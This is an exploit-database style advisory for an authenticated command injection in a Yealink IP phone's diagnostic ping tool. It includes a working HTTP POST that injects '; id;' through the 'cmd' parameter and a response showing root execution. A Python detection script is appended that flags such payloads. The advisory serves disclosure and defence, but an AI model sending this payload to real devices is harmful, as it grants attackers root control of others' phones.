
5 changes to exploits/shellcodes AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC) AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC) YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated) Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3) FormaLMS 2.4.4 - Authentication Bypass
# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
# Date: 11-10-2021
# Exploit Author: tahaafarooq
# Vendor Homepage: https://www.yealink.com/
# Version: 53.84.0.15
# Tested on: YeaLink IP Phone SIP-T19P (Hardware VOIP Phone)

Description:

The Diagnostic tool on the Networking tab, used to perform a Ping or Traceroute, can be used to perform OS command injection through the 'cmd' parameter.

POC:

POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close

cmd=; id;&token=1714636915c6acea98

-------------------------------------------------

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82

<html>
<body>
<div id="_RES_INFO_">
uid=0(root) gid=0(root)
</div>
</body>
</html>
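
A detection check for the request shape above, added here as an example (it is not part of the original advisory and is not Yealink's code): it matches POSTs to the network-diagnosis docmd endpoint and flags a 'cmd' value that is not a plain IP address or hostname. The function names, and the assumption that a legitimate 'cmd' value is only a host or address, are the example's own.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate diagnostic target is only a hostname or IP address.
# Adjust the allowlist if the firmware's normal 'cmd' value has another shape.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")

def is_valid_target(value: str) -> bool:
    """True only for an IP address or an RFC 1123 style hostname."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        pass
    if not value or len(value) > 253:
        return False
    return all(_LABEL.fullmatch(label) for label in value.split("."))

def is_diag_request(request_line: str) -> bool:
    """Match POST requests to the diagnosis endpoint shown in the PoC."""
    parts = request_line.split()
    if len(parts) < 2 or parts[0] != "POST":
        return False
    url = urlsplit(parts[1])
    query = parse_qs(url.query, separator="&")
    return (url.path == "/servlet"
            and query.get("p") == ["network-diagnosis"]
            and query.get("q") == ["docmd"])

def suspicious_cmd(request_line: str, body: str):
    """Return the offending decoded 'cmd' value, or None if nothing is flagged."""
    if not is_diag_request(request_line):
        return None
    fields = parse_qs(body, keep_blank_values=True, separator="&")
    for value in fields.get("cmd", []):
        if not is_valid_target(value.strip()):
            return value
    return None

if __name__ == "__main__":
    line = "POST /servlet?m=mod_data&p=network-diagnosis&q=docmd HTTP/1.1"
    # First body is the one from the PoC; the second is a constructed benign case.
    for body in ("cmd=; id;&token=1714636915c6acea98", "cmd=192.168.1.1&token=x"):
        print(repr(body), "->", repr(suspicious_cmd(line, body)))
```

The same allowlist, applied on the device side before the value reaches a shell, is the corresponding fix; on the network side it works on decoded bodies, so URL-encoded variants of the same payload are flagged as well.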